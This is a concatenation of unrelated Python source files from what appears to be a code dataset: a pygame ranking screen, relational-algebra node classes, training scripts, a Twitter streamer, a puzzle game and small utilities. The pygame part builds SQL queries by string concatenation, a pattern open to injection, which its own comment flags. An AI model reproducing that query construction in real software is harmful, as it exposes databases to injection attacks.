        text = font80.render("distance", True, (0, 0, 0))
        screen.blit(text,[960-text.get_width()/2,150])
        # Left table occupies (70-620)x(200-550)
        for i in range(len(txtrank)):
            rankstr = font50.render(countingStr(i+1), True, (0, 0, 0))
            username = font50.render(str(txtrank[i][0]), True, (0, 0, 0))
            txtscore = font50.render(str(txtrank[i][1]), True, (0, 0, 0))
            screen.blit(rankstr, [80, 210+70*i])
            screen.blit(username, [210,210+70*i])
            screen.blit(txtscore, [500,210+70*i])
            pygame.draw.rect(screen, (0,0,0), Rect(70,200+70*i,550,70),10)
            pygame.draw.line(screen, (0,0,0), (190,200+70*i), (190,270+70*i), 10)
            pygame.draw.line(screen, (0,0,0), (480,200+70*i), (480,270+70*i), 10)
        # Right table occupies (660-1210)x(200-550)
        for i in range(len(runrank)):
            rankstr = font50.render(countingStr(i+1), True, (0, 0, 0))
            username = font50.render(str(runrank[i][0]), True, (0, 0, 0))
            runscore = font50.render(str(runrank[i][1]), True, (0, 0, 0))
            screen.blit(rankstr, [670, 210+70*i])
            screen.blit(username, [800, 210 + 70 * i])
            screen.blit(runscore, [1090, 210 + 70 * i])
            pygame.draw.rect(screen, (0, 0, 0), Rect(660, 200 + 70 * i, 550, 70), 10)
            pygame.draw.line(screen, (0, 0, 0), (790, 200 + 70 * i), (790, 270 + 70 * i), 10)
            pygame.draw.line(screen, (0, 0, 0), (1070, 200 + 70 * i), (1070, 270 + 70 * i), 10)
        # Event handling
        events = pygame.event.get()
        for event in events:
            if event.type == QUIT:
                gameend()
            elif event.type == KEYDOWN:
                if event.key == K_ESCAPE:
                    gameend()
                # Register in the ranking
                elif event.key == K_RETURN:
                    username = textinput.get_text()
                    # Rudimentary SQL-injection guard (character whitelist)
                    ok = len(username) < 64
                    for i in username:
                        if not i in "abcdefghijklmnopqretuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_!?.,(){}[]@":
                            ok = False
                    if ok:
                        # If the name exists keep the per-column minimum,
                        # otherwise insert; then switch to the ranking screen.
                        # NOTE(review): SQL built by string concatenation — the
                        # whitelist covers username but mapstr/problemstr come
                        # from filenames; prefer parameterized queries.
                        cur.execute("SELECT run,txt FROM ranking WHERE name = \"" + username + "\" AND map = \"" + mapstr + "\" AND problem = \"" + problemstr + "\"")
                        result = cur.fetchall()
                        if len(result) == 0:
                            cur.execute("INSERT INTO ranking VALUE(\""+username+"\", {:.3f}, {:d}, \"".format(run, txt) + mapstr + "\", \"" + problemstr + "\")")
                        else:
                            run = min(run, result[0][0])
                            txt = min(txt, result[0][1])
                            cur.execute("UPDATE ranking SET run = {:.3f}, txt = {:d} WHERE name = \"".format(run, txt) + username + "\"")
                        conn.commit()
                        updatesql()
                        mode = G_RANKING
        # Username input field
        text = font50.render("Register with the ranking!! Your Name:", True, (0, 0, 0))
        screen.blit(text, (50, 600))
        textinput.update(events)
        screen.blit(textinput.get_surface(), (700, 600))
    # Ranking display
    elif mode == G_RANKING:
        # Frame
        pygame.draw.rect(screen, (255, 255, 200), Rect(30, 10, 1220, 700))
        # Your record
        txt, run = get_score()
        text = font100.render("Score: {:d}bytes / {:.3f}miles".format(txt, run), True, (0, 0, 0))
        screen.blit(text, [(w - text.get_width()) // 2, 10])
        # Ranking display
        text = font80.render("code", True, (0, 0, 0))
        screen.blit(text, [320 - text.get_width() / 2, 150])
        text = font80.render("distance", True, (0, 0, 0))
        screen.blit(text, [960 - text.get_width() / 2, 150])
        # Left table occupies (70-620)x(200-550)
        for i in range(len(txtrank)):
            rankstr = font50.render(countingStr(i + 1), True, (0, 0, 0))
            username = font50.render(str(txtrank[i][0]), True, (0, 0, 0))
            txtscore = font50.render(str(txtrank[i][1]), True, (0, 0, 0))
            screen.blit(rankstr, [80, 210 + 70 * i])
            screen.blit(username, [210, 210 + 70 * i])
            screen.blit(txtscore, [500, 210 + 70 * i])
            pygame.draw.rect(screen, (0, 0, 0), Rect(70, 200 + 70 * i, 550, 70), 10)
            pygame.draw.line(screen, (0, 0, 0), (190, 200 + 70 * i), (190, 270 + 70 * i), 10)
            pygame.draw.line(screen, (0, 0, 0), (480, 200 + 70 * i), (480, 270 + 70 * i), 10)
        # Right table occupies (660-1210)x(120-550)
        for i in range(len(runrank)):
            rankstr = font50.render(countingStr(i + 1), True, (0, 0, 0))
            username = font50.render(str(runrank[i][0]), True, (0, 0, 0))
            runscore = font50.render(str(runrank[i][1]), True, (0, 0, 0))
            screen.blit(rankstr, [670, 210 + 70 * i])
            screen.blit(username, [800, 210 + 70 * i])
            screen.blit(runscore, [1090, 210 + 70 * i])
            pygame.draw.rect(screen, (0, 0, 0), Rect(660, 200 + 70 * i, 550, 70), 10)
            pygame.draw.line(screen, (0, 0, 0), (790, 200 + 70 * i), (790, 270 + 70 * i), 10)
            pygame.draw.line(screen, (0, 0, 0), (1070, 200 + 70 * i), (1070, 270 + 70 * i), 10)
        # Event handling
        for event in pygame.event.get():
            if event.type == QUIT:
                gameend()
            elif event.type == KEYDOWN:
                if event.key == K_ESCAPE:
                    gameend()
                elif event.key == K_RETURN:
                    mapdelete()
                    mode = G_SELECT_MAP
    # Game-over screen
    elif mode == G_FIRED:
        screen.blit(fired, [(w - fired.get_width()) / 2, (h - fired.get_height()) / 2])
        for event in pygame.event.get():
            if event.type == QUIT:
                gameend()
            elif event.type == KEYDOWN:
                if event.key == K_ESCAPE:
                    gameend()
                if event.key == K_RETURN:
                    mode = G_TITLE
    pygame.display.update()
    clock.tick(30)
|
21,531 | 29b374e3bfd85b36f5f7f4a937d0c9eb6265721b | __author__ = 'Thomas Li Fredriksen'
__license__ = 'MIT'
from .pyswitch import PySwitch, SwitchCase
|
21,532 | b5239d7f746dbf4c982e5708f723213286b5d211 | import json
from typing import List
from DDBMS.Parser.SQLQuery.Column import Column
from DDBMS.Parser.SQLQuery.Table import Table
from abc import ABC, abstractmethod
#TODO add a function to return the output dict as dict (for pretty printing later)
class Node(ABC):
    """Base class for relational-algebra query-tree nodes.

    Tracks a parent pointer plus an ordered child list; addChild keeps the
    two sides consistent.
    """

    def __init__(self, *, children=None) -> None:
        """Create a node, adopting each entry of `children` (if any).

        Fix: the original used the mutable default `children=[]`; passing
        an explicit list (including []) still behaves identically.
        """
        super().__init__()
        self.parent = None
        self.children = []
        for child in (children or []):
            self.addChild(child)

    def addChild(self, child) -> None:
        """Append `child` and point its parent back at this node."""
        child.parent = self
        self.children.append(child)

    @abstractmethod
    def __repr__(self) -> str:
        output = {
            'Node': {
                'children': str(self.children)
            }
        }
        return str(output)
class SelectNode(Node):
    """Relational selection: filters child output by `predicate`."""

    def __init__(self, *, predicate, children = []) -> None:
        super().__init__(children=children)
        self.predicate = predicate

    def __repr__(self) -> str:
        return str({
            'Select': {
                'predicate': str(self.predicate),
                'children': str(self.children),
            }
        })
class ProjectNode(Node):
    """Relational projection onto the given columns."""

    def __init__(self, *, columns : List[Column], children=[]) -> None:
        super().__init__(children=children)
        self.columns = columns

    def __repr__(self) -> str:
        return str({
            'Project': {
                'columns': str(self.columns),
                'children': str(self.children),
            }
        })
class GroupbyNode(Node):
    """Grouping operator keyed on `group_by_columns`."""

    def __init__(self, *, group_by_columns : List[Column], children = []) -> None:
        super().__init__(children=children)
        self.group_by_columns = group_by_columns

    def __repr__(self) -> str:
        return str({
            'Groupby': {
                'group_by_columns': str(self.group_by_columns),
                'children': str(self.children),
            }
        })
class UnionNode(Node):
    """Set union of all child results."""

    def __init__(self, *, children = []) -> None:
        super().__init__(children=children)

    def __repr__(self) -> str:
        return str({
            'Union': {
                'children': str(self.children),
            }
        })
class JoinNode(Node):
    """Join of the children on `join_predicate`.

    Note: unlike its siblings, `children` is positional here — kept that
    way for backward compatibility with existing callers.
    """

    def __init__(self, join_predicate, children = []) -> None:
        super().__init__(children=children)
        self.join_predicate = join_predicate

    def __repr__(self) -> str:
        # Bug fix: the original labelled this node 'Union' (copy-paste error),
        # making Join and Union nodes indistinguishable in dumps.
        output = {
            'Join': {
                'join_predicate': str(self.join_predicate),
                'children': str(self.children)
            }
        }
        return str(output)
class CrossNode(Node):
    """Cross (Cartesian) product of the children."""

    def __init__(self, *, children = []) -> None:
        super().__init__(children=children)

    def __repr__(self) -> str:
        return str({
            'Cross': {
                'children': str(self.children),
            }
        })
class RelationNode(Node):
    """Leaf node wrapping a base table (no children)."""

    def __init__(self, table : Table) -> None:
        super().__init__(children=[])
        self.table = table

    def __repr__(self) -> str:
        return str({
            'Relation': {
                'table': str(self.table),
                'children': str(self.children),
            }
        })

    def __eq__(self, o: object) -> bool:
        """Compare equal to a bare Table carrying the same table.

        NOTE(review): defining __eq__ without __hash__ makes instances
        unhashable — confirm that is intended.
        """
        if isinstance(o, Table):
            return self.table == o
        return super().__eq__(o)
|
21,533 | f4df9703657cda305a933801117558d2d75813a0 | import os
import cv2
import shutil
# count = 0
# for dir_ in os.listdir("google_images/"):
# for img_name in os.listdir("google_images/"+dir_+"/"):
# source = "google_images/"+dir_+"/"+img_name
# try:
# img = cv2.imread(source, 0)
# img = cv2.resize(img, (250, 250))
# cv2.imwrite(f"neg/neg_{count}.png", img)
# count += 1
# except Exception as e:
# print(e)
# print(source, end="\n\n")
# print(count)
# count = 0
# for img_name in os.listdir("fer_/"):
# try:
# img = cv2.imread("fer_/"+img_name, 0)
# img = cv2.resize(img, (96,96))
# cv2.imwrite(f"fer/fer_{count}.png", img)
# count += 1
# except Exception as e:
# print(e)
# print(img_name)
# print(count)
# Scan pos/ and collect the set of distinct image shapes plus a readable count.
count = 0
img_size = set()
for image_name in os.listdir("pos/"):
    try:
        # cv2.imread returns None for unreadable files; the .shape access then
        # raises AttributeError, which lands in the except branch below.
        img = cv2.imread("pos/"+image_name, 0)
        img_size.add(img.shape)
        count += 1
    except Exception:
        print(image_name)
print(img_size, count)
# import os
# from PIL import Image
# count = 0
# for infile in os.listdir("jaffe/"):
# print("file : ", infile)
# if infile[-4:] == "tiff":
# outfile = f"jaffe_/jap_{count}.png"
# im = Image.open("jaffe/" + infile)
# print("new filename : ",outfile)
# out = im.convert("RGB")
# out.save(outfile, "png", quality=90)
# count += 1
# else:
# print("in else")
# count = 0
# for image_name in os.listdir("jaffe_/"):
# img = cv2.imread("jaffe_/"+image_name, 0)
# w, h = img.shape
# img = img[int(w*0.2): int(w*0.9), int(h*0.25): int(h*0.75)]
# cv2.imwrite(f"jaffe/jap_{count}.png", img)
# count += 1
# print(count)
# count = 0
# for dir_ in os.listdir("datasets/"):
# for img in os.listdir("datasets/"+dir_+"/"):
# source = "datasets/" + dir_ + "/" + img
# dest = "pos/"
# shutil.copy(source, dest)
# count += 1
# print(count) |
21,534 | 1415ccd175ad67d3fe57298de686753dbf6ec224 | """
@authors: YOU
"""
import MongoManager
import TwitterManager
import Constants
import Variables
import pymongo
if __name__ == '__main__':
    # Only bootstrap a brand-new research collection when this is not a
    # resumed/existing research run.
    if not Variables.Database.EXISTING_RESEARCH:
        # Connect to the default host and port. Can be specified : MongoClient('localhost', 27017)
        client = pymongo.MongoClient()
        # Create the default document structure in which the tweets will be uploaded
        doc = MongoManager.createDefaultDoc(Variables.Database.RESEARCH_PYTHON_ID, Variables.Database.RESEARCH_USER_ID, Variables.Database.RESEARCH_TITLE, Variables.Database.RESEARCH_DESC, Variables.Database.DURATION, Variables.Database.WORDS)
        # Create a new research collection (and the database if it's the first time) and insert the doc into it
        MongoManager.createNewResearchColl(doc, Variables.Database.COLL_NAME, Variables.Database.DB_NAME, client)
        # Release this client because we're using another one in on_success.
        # BUG FIX: MongoClient.disconnect() was deprecated in pymongo 3.0 and
        # later removed; close() is the supported way to release the client.
        client.close()
    # Create the stream with the different Twitter keys/access tokens
    streamer = TwitterManager.TweetStreamer(Constants.Connexion.CONSUMER_KEY, Constants.Connexion.CONSUMER_SECRET, Constants.Connexion.ACCESS_TOKEN_KEY, Constants.Connexion.ACCESS_TOKEN_SECRET)
    # Add a filter to the stream, about the track to keep (words) and the language
    streamer.statuses.filter(track=Variables.Database.TRACK, language=Constants.Stream.LANG)
|
21,535 | 16a74b53248362a24097d6e36f421e99dfc72b80 | #Задача 5.
#Відсортувати кожен рядок двовимірного масиву у порядку зростання.
# Read an n-by-m matrix of integers, warn when a row has the wrong number of
# columns, then print every row sorted in ascending order.
n = int(input("Enter number rows :"))
m = int(input("Enter number cloums :"))
num_lst = []
for _ in range(n):
    row = [int(token) for token in input("Введите числа через пробел ").split()]
    num_lst.append(row)
    print(len(row))
    if len(row) != m:
        print("Количество столбиков вышло за предел")
for row in num_lst:
    print(sorted(row))
21,536 | 3be2c6b631942f0f7123c69ce38e23a79125c9f9 | # import datasize
# Binary data-size units expressed in bytes (1 KB here = 1024 B).
BYTE = 1
KILOBYTE = 1024 ** 1
MEGABYTE = 1024 ** 2
GIGABYTE = 1024 ** 3
TERABYTE = 1024 ** 4
|
21,537 | 0f10041e9f781ddc0dcf2c31fc815efc9b481529 | import torch
from torch import nn
from torch.autograd import Variable
import time
import os
from validation import val_epoch
from model import generate_model
from opts import parse_opts
from utils import AverageMeter, accuracy, adjust_learning_rate, save_checkpoint
from dataset import Video
from spatial_transforms import (Compose, Normalize, Scale,
CenterCrop, CornerCrop, MultiScaleCornerCrop,
MultiScaleRandomCrop, RandomHorizontalFlip, ToTensor)
from temporal_transforms import TemporalRandomCrop, LoopPadding
import numpy as np
from torch.optim import lr_scheduler
from mean import get_mean
from collections import defaultdict
best_prec1 = 0
def train_epoch(epoch, data_loader, model, criterion, optimizer, opt):
    """Run one training epoch of *model* over *data_loader*.

    Tracks batch/data timing, loss and top-1/top-5 accuracy, logging every
    ``opt.print_freq`` iterations. Updates the optimizer state in place.
    """
    print('train at epoch {} with lr {}'.format(epoch, optimizer.param_groups[-1]['lr']))
    model.train()
    batch_time = AverageMeter()
    data_time = AverageMeter()
    losses = AverageMeter()
    top1 = AverageMeter()
    top5 = AverageMeter()
    end_time = time.time()
    for i, (inputs, targets, _) in enumerate(data_loader):
        data_time.update(time.time() - end_time)
        if not opt.no_cuda:
            # BUG FIX: `async` became a reserved keyword in Python 3.7, so
            # .cuda(async=True) is a SyntaxError; non_blocking=True is the
            # replacement (torch >= 0.4).
            targets = targets.cuda(non_blocking=True)
        inputs = Variable(inputs)
        targets_var = Variable(targets)
        outputs = model(inputs)
        loss = criterion(outputs, targets_var)
        prec1, prec5 = accuracy(outputs.data, targets, topk=(1, 5))
        # loss.data[0] was removed in torch 0.4; .item() extracts the scalar.
        losses.update(loss.item(), inputs.size(0))
        top1.update(prec1[0], inputs.size(0))
        top5.update(prec5[0], inputs.size(0))
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()
        batch_time.update(time.time() - end_time)
        end_time = time.time()
        if i % opt.print_freq == 0:
            print('Epoch: [{0}][{1}/{2}]\t'
                  'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
                  'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
                  'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
                  'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\t'
                  'Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(
                epoch, i + 1, len(data_loader), batch_time=batch_time,
                data_time=data_time, loss=losses, top1=top1, top5=top5))
def validate(val_loader, model, criterion):
    """Evaluate *model* on *val_loader*; return (avg loss, avg top-1 precision).

    NOTE(review): ``opt`` is read from module scope (it is assigned under the
    __main__ guard), so this function raises NameError if imported and called
    from another module -- confirm whether it should take ``opt`` explicitly.
    """
    batch_time = AverageMeter()
    losses = AverageMeter()
    top1 = AverageMeter()
    top5 = AverageMeter()
    model.eval()
    end = time.time()
    # torch.no_grad() replaces the removed Variable(volatile=True) API for
    # gradient-free inference (torch >= 0.4).
    with torch.no_grad():
        for i, (input, target, _) in enumerate(val_loader):
            # `async` is a reserved keyword since Python 3.7; use non_blocking.
            target = target.cuda(non_blocking=True)
            output = model(input)
            loss = criterion(output, target)
            prec1, prec5 = accuracy(output.data, target, topk=(1, 5))
            # .item() replaces the removed loss.data[0] scalar access.
            losses.update(loss.item(), input.size(0))
            top1.update(prec1[0], input.size(0))
            top5.update(prec5[0], input.size(0))
            batch_time.update(time.time() - end)
            end = time.time()
            if i % opt.print_freq == 0:
                print(('Test: [{0}/{1}]\t'
                       'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
                       'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
                       'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\t'
                       'Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(
                    i, len(val_loader), batch_time=batch_time, loss=losses,
                    top1=top1, top5=top5)))
    print(('Testing Results: Prec@1 {top1.avg:.3f} Prec@5 {top5.avg:.3f} Loss {loss.avg:.5f}'
           .format(top1=top1, top5=top5, loss=losses)))
    return losses.avg, top1.avg
if __name__ == '__main__':
    # Entry point: build options, data pipelines, model, optimizer, then run
    # the train / periodic-validate / checkpoint loop.
    opt = parse_opts()
    opt.mean = get_mean(1)
    opt.arch = '{}-{}'.format(opt.model_name, opt.model_depth)
    opt.sample_duration = 16
    # Build the multi-scale crop pyramid: each scale is the previous one
    # multiplied by scale_step.
    opt.scales = [opt.initial_scale]
    for i in range(1, opt.n_scales):
        opt.scales.append(opt.scales[-1] * opt.scale_step)
    print('#####', opt.scales)
    print(opt.mean)
    # Training augmentation: random multi-scale corner crops + horizontal flips.
    spatial_transform = Compose([MultiScaleCornerCrop(opt.scales, opt.sample_size),
                                 RandomHorizontalFlip(),
                                 ToTensor(1),
                                 Normalize(opt.mean, [1, 1, 1])])
    temporal_transform = TemporalRandomCrop(opt.sample_duration)
    train_data = Video(opt.train_list, spatial_transform=spatial_transform,
                       temporal_transform=temporal_transform,
                       sample_duration=opt.sample_duration, n_samples_for_each_video=1)
    train_loader = torch.utils.data.DataLoader(train_data, batch_size=opt.batch_size, shuffle=True, num_workers=opt.n_threads, pin_memory=True)
    # Validation: deterministic scale + center crop, loop-padded clips.
    val_spatial_transform = Compose([Scale(opt.sample_size),
                                     CenterCrop(opt.sample_size),
                                     ToTensor(1),
                                     Normalize(opt.mean, [1, 1, 1])])
    val_temporal_transform = LoopPadding(opt.sample_duration)
    val_data = Video(opt.val_list, spatial_transform=val_spatial_transform,
                     temporal_transform=val_temporal_transform,
                     sample_duration=opt.sample_duration, n_samples_for_each_video=opt.n_val_samples)
    val_loader = torch.utils.data.DataLoader(val_data, batch_size=opt.batch_size, shuffle=False, num_workers=opt.n_threads, pin_memory=True)
    model, policies = generate_model(opt)
    model = nn.DataParallel(model, device_ids=opt.gpus).cuda()
    # Optional warm start from a checkpoint, skipping classifier ('fc') weights.
    if opt.finetune:
        if os.path.isfile(opt.finetune):
            print('finetuning from model {}'.format(opt.finetune))
            model_data = torch.load(opt.finetune)
            own_state = model.state_dict()
            for k, v in model_data['state_dict'].items():
                if 'fc' in k:
                    continue
                print(k)
                if isinstance(v, torch.nn.parameter.Parameter):
                    v = v.data
                assert v.dim() == own_state[k].dim(), '{} {} vs {}'.format(k, v.dim(), own_state[k].dim())
                own_state[k].copy_(v)
        else:
            assert False, ("=> no checkpoint found at '{}'".format(opt.finetune))
    # Optional full resume: restores epoch counter, best accuracy and weights.
    if opt.resume:
        if os.path.isfile(opt.resume):
            print('loading model {}'.format(opt.resume))
            model_data = torch.load(opt.resume)
            opt.start_epoch = model_data['epoch']
            best_prec1 = model_data['best_prec1']
            model.load_state_dict(model_data['state_dict'])
        else:
            assert False,("=> no checkpoint found at '{}'".format(opt.resume))
    criterion = torch.nn.CrossEntropyLoss().cuda()
    optimizer = torch.optim.SGD(policies, opt.lr, momentum=opt.momentum, dampening=opt.dampening,
                                weight_decay=opt.weight_decay, nesterov=opt.nesterov)
    # Decay the learning rate when the validation loss plateaus.
    scheduler = lr_scheduler.ReduceLROnPlateau(optimizer, 'min', patience=opt.lr_patience)
    for epoch in range(opt.start_epoch, opt.epochs):
        #adjust_learning_rate(optimizer, epoch, opt.lr_steps, opt)
        train_epoch(epoch, train_loader, model, criterion, optimizer, opt)
        # Periodic evaluation + checkpointing of the best top-1 model.
        if (epoch + 1) % opt.eval_freq == 0 or epoch == opt.epochs - 1:
            loss, prec1 = validate(val_loader, model, criterion)
            is_best = prec1 > best_prec1
            best_prec1 = max(prec1, best_prec1)
            save_checkpoint({
                'epoch': epoch + 1,
                'arch': opt.arch,
                'state_dict': model.state_dict(),
                'optimizer' : optimizer.state_dict(),
                'best_prec1': best_prec1,
            }, is_best, opt.snapshot_pref)
            print('best_prec1: ', best_prec1)
            scheduler.step(loss)
|
21,538 | a449b2bf7108076727a671217c0e1245cb9acbb0 | # 수도요금
# https://www.acmicpc.net/problem/10707
# https://github.com/yhs3434/Algorithms
# Water bill: pick the cheaper of plan X (a won per litre) and plan Y
# (flat fee b for the first c litres, then d won per extra litre).
a = int(input())
b = int(input())
c = int(input())
d = int(input())
p = int(input())
plan_x = a * p
plan_y = b + (d * (p - c) if p > c else 0)
print(min(plan_x, plan_y))
21,539 | 2d01be5bb369206521705ec53cd0b87c44b30a98 | import numpy as np
from .policy import Policy
from Models.model import Model
class ValueIteration(Policy):
    """Policy computed offline with value iteration over the model's MDP.

    On construction, runs value iteration (theta=0.001, gamma=0.99) over all
    states returned by the model and stores the resulting greedy policy.
    """
    def __init__(self, model):
        super().__init__()
        self.model = model
        self.states = model.get_all_states()
        # state-value table, initialised to zero for every state
        self.V = dict()
        for s in self.states:
            self.V[s] = 0
        # hard-coded: drop the terminal state because it has no possible
        # actions, which breaks the max over Q-values in value_iteration
        self.states.remove('fin_robo')
        self.policy = self.value_iteration(0.001, 0.99, self.V)
    def action(self, actions, state):
        """Return the precomputed greedy action for *state* (ignores *actions*)."""
        return self.policy[state]
    def Q(self, state, action, V, gamma=0.99):
        """Expected discounted return of taking *action* in *state* under values V."""
        #states_prob_rewards type: [(state, probability, reward)]
        states_prob_rewards = self.model.posible_states(state, action)
        return np.sum([self.Q_help(state, action, s_p_r, V, gamma) for s_p_r in states_prob_rewards])
    def Q_help(self, state, action, state_probability_reward, V, gamma):
        """One Bellman term: T * (R + gamma * V[next_state])."""
        T = state_probability_reward[1]
        next_s = state_probability_reward[0]
        R = state_probability_reward[2]
        return T * (R + gamma * V[next_s])
    def value_iteration(self, theta, gamma, V):
        """Iterate Bellman backups until max value change < *theta*; return the greedy policy."""
        done = False
        policy = dict()
        while not done:
            delta = 0
            for s in self.states:
                old = V[s]
                actions = self.model.posible_actions(s)
                all_Qs = [self.Q(s, a , V) for a in actions]
                V[s] = np.max(all_Qs)
                policy[s] = actions[np.argmax(all_Qs)]
                delta = max(delta, abs(old - V[s]))
            done = delta < theta
        return policy
|
21,540 | e2608f5b6fb2af94cce6ad33b0390da391bab8e3 | """
Mini puzzle - Kagynt
lexical number succession
"""
def numSuccession ():
    """Interactive escape-room puzzle.

    The player explores four walls; the left/right/back walls give hints and
    the front wall holds three stone rings. Setting the rings to the digits
    in ``answer`` ("5", "6", "6") locks them and lets the door be pushed open.
    """
    tried = 0
    lWall = "1:~, 4:4, 2:~, 7:5, 5:4"
    rWall = "3:5, 6:3, 10:3, 12:6, 20:6"
    Wall = "8:_, 11:_, 90:_"
    # correct digits for the three rings (under the numbers 8, 11 and 90)
    answer= ["5", "6", "6"]
    query = ["0","0","0"]
    win = False
    lock = False
    print('''You find yourself in a room with no doors or windows\n and what it seems to be letters on the walls''')
    while not win:
        deci = input("What would you like to do?\nA: Walk to the left wall.\nB: Walk to the right wall.\nC: Walk to the front wall.\nD: Walk to the back wall.\n")
        while deci not in ("A", "B", "C", "D", "a", "b", "c", "d"):
            deci = input("Invalid command. Please choose again... \n")
        #Making my way to the Left
        if deci in ("A","a"):
            print("You see a pretty damaged writing in the wall")
            print("You manage to read some numbers along the broken (~) pieces of wall")
            print(lWall)
            deci = input("Press B to go back\n")
            while deci not in ("B", "b"):
                deci = input("Invalid command. Please choose again... \n")
            print("You're back at the center of the room")
        #Making my way to the Right
        elif deci in ("B", "b"):
            print("You see a very well conserved wall")
            print("It seems as if it was part of an archaeological collection.\nThere are some numbers written in it")
            print(rWall)
            deci = input("Press B to go back\n")
            while deci not in ("B", "b"):
                deci = input("Invalid command. Please choose again... \n")
            print("You're back at the center of the room")
        #Now you're looking at the Front
        elif deci in ("C", "c"):
            print("There lies a very ominous-looking gate in front of you, with no apparent handle\nand it seems like not even a hundred men could break it open")
            #Second+ Try
            if Wall != "8:_, 11:_, 90:_":
                deci =input("What would you like to do?\nA: Change the rings.\nB: Push the door\nC: Go back.\n")
            else:
                deci =input("What would you like to do?\nA:Inspect closer.\nB: Push the door\nC: Go back.\n")
            while deci not in ("A", "a","B","b","C","c"):
                deci = input("Invalid command. Please choose again... \n")
            if deci in ("A","a"):
                if tried == 0:
                    print("You find three very small stone rings with numbers engraved on them,\n every single one is below a big faint number on the wall(8, 11 and 90)")
                    print('''Next to the rings, there's a very faint writing on the wall, you squint your eyes and read it....\n"He who attempts to defile the vault, must first overcome the trial of the observant" '''+Wall+'''\nHmmm... perhaps it has something to do with the ring's number?''')
                # rings can only be changed while not yet locked in place
                if not lock:
                    Wall = "8:_, 11:_, 90:_"
                    print(Wall)
                    query[0] = input("So what would you like to set the first ring to? (0-9)\n")
                    while query[0] not in ("0", "1", "2", "3", "4", "5", "6", "7", "8", "9"):
                        query[0] = input("Invalid command. Please choose again... \n")
                    Wall = Wall.replace("_", query[0], 1)
                    print(Wall)
                    query[1] = input("What about the second one? (0-9)\n")
                    while query[1] not in ("0", "1", "2", "3", "4", "5", "6", "7", "8", "9"):
                        query[1] = input("Invalid command. Please choose again... \n")
                    Wall = Wall.replace("_", query[1], 1)
                    print(Wall)
                    query[2] = input("And the third one? (0-9)\n")
                    while query[2] not in ("0", "1", "2", "3", "4", "5", "6", "7", "8", "9"):
                        query[2] = input("Invalid command. Please choose again... \n")
                    Wall = Wall.replace("_", query[2], 1)
                    print(Wall)
                    if query == answer:
                        print("You hear a quiet click and the rings lock in place")
                        lock = True
                    else:
                        print("Nothing seems to happen")
                    deci = input("Press B to go back\n")
                    while deci not in ("B", "b"):
                        deci = input("Invalid command. Please choose again... \n")
                else:
                    print("They're locked")
                    deci = input("Press B to go back\n")
                    while deci not in ("B", "b"):
                        deci = input("Invalid command. Please choose again... \n")
                tried = 1
            elif deci in ("B", "b"):
                # pushing the door only works once the rings are locked
                if lock:
                    print("The door opens wide almost effortlessly. Congratulations!!")
                    win = True
                else:
                    print("It won't move")
                    deci = input("Press B to go back\n")
                    while deci not in ("B", "b"):
                        deci = input("Invalid command. Please choose again... \n")
            if not win:
                print("You're back at the center of the room")
        #This is the back door
        elif deci in ("D","d"):
            print("You find a writing on the floor, it doesn't look like it is part of the initial design of the tomb")
            print('''It says:"Psst psst! Count the first ones!!!"....the first what?''')
            deci = input("Press B to go back\n")
            while deci not in ("B", "b"):
                deci = input("Invalid command. Please choose again... \n")
            print("You're back at the center of the room")
#
def ringMove(z1, z2):
    """Describe the shortest rotation of a 10-tick ring from position z1 to z2."""
    delta = z2 - z1
    if delta == 0:
        return ("You let the ring be.")
    if abs(delta) == 5:
        # exactly opposite: both directions cost the same 5 ticks
        return ("You move the ring 5 ticks.")
    if abs(delta) > 5:
        # more than half a turn: going the other way round is shorter
        direction = "left" if delta > 0 else "right"
        ticks = 10 - abs(delta)
    else:
        direction = "right" if delta > 0 else "left"
        ticks = abs(delta)
    return ("You move the ring " + str(ticks) + " ticks to the " + direction + ".")
numSuccession()
#print(ringMove(0, 5))
|
21,541 | bfbab49494557f87922c974e869d4d2c4cf255ee | def solution(n, l, r):
reserve = set(r) - set(l)
lost = set(l) - set(r)
answer = n - len(reserve) - len(lost) # init
for v in reserve:
if v - 1 in lost:
answer += 2
lost.remove(v - 1)
elif v + 1 in lost:
answer += 2
lost.remove(v + 1)
else:
answer += 1
return answer |
21,542 | 8c9ebad067c88ec1986af1317b2b55e9f9eed10d | import registry
import settings
import random
from objects.bullets.grenade_launcher_bullet import GrenadeLauncherBullet
from objects.weapons.base import WeaponBase
from kaa.geometry import Vector
class GrenadeLauncher(WeaponBase):
    """Grenade-launcher weapon node: fires GrenadeLauncherBullet projectiles."""
    def __init__(self):
        # node's properties
        super().__init__(sprite=registry.global_controllers.assets_controller.grenade_launcher_img)
    def shoot_bullet(self):
        """Spawn one grenade bullet along the parent's facing, restart the cooldown and play the shot sound."""
        bullet_position = self.get_initial_bullet_position()
        bullet_velocity = Vector.from_angle_degrees(
            self.parent.rotation_degrees) * settings.GRENADE_LAUNCHER_BULLET_SPEED
        self.scene.space.add_child(GrenadeLauncherBullet(position=bullet_position, velocity=bullet_velocity))
        # reset cooldown time
        self.cooldown_time_remaining = self.get_cooldown_time()
        # play shooting sound
        registry.global_controllers.assets_controller.grenade_launcher_shot_sound.play()
    def get_cooldown_time(self):
        """Seconds between consecutive shots for this weapon."""
        return 1.000
|
21,543 | ba8ce3e25e012b9ab77c7d46bf7c285b216f8a10 | # -*- coding: utf-8 -*-
# Filename lxml_requests.py
# Author Lasse Vang Gravesen <gravesenlasse@gmail.com>
# First edited 28-08-2012 01:30
# Last edited 28-08-2012 03:38
import lxml.html, lxml.etree
import requests
# HTML
def html(url):
    """Fetch *url* and parse the response body as an lxml HTML tree."""
    response = requests.get(url)
    return lxml.html.fromstring(response.text)
def html_tostring(html):
    """Serialize a parsed HTML tree back to pretty-printed markup."""
    markup = lxml.html.tostring(html, pretty_print=True)
    return markup
def html_fromstring(s):
    """Parse an HTML string into an lxml HTML tree."""
    tree = lxml.html.fromstring(s)
    return tree
# XML
def xml(url):
    """Fetch *url* and parse the response body as an lxml XML tree."""
    response = requests.get(url)
    return lxml.etree.fromstring(response.text)
def xml_tostring(xml):
    """Serialize a parsed XML tree back to pretty-printed markup."""
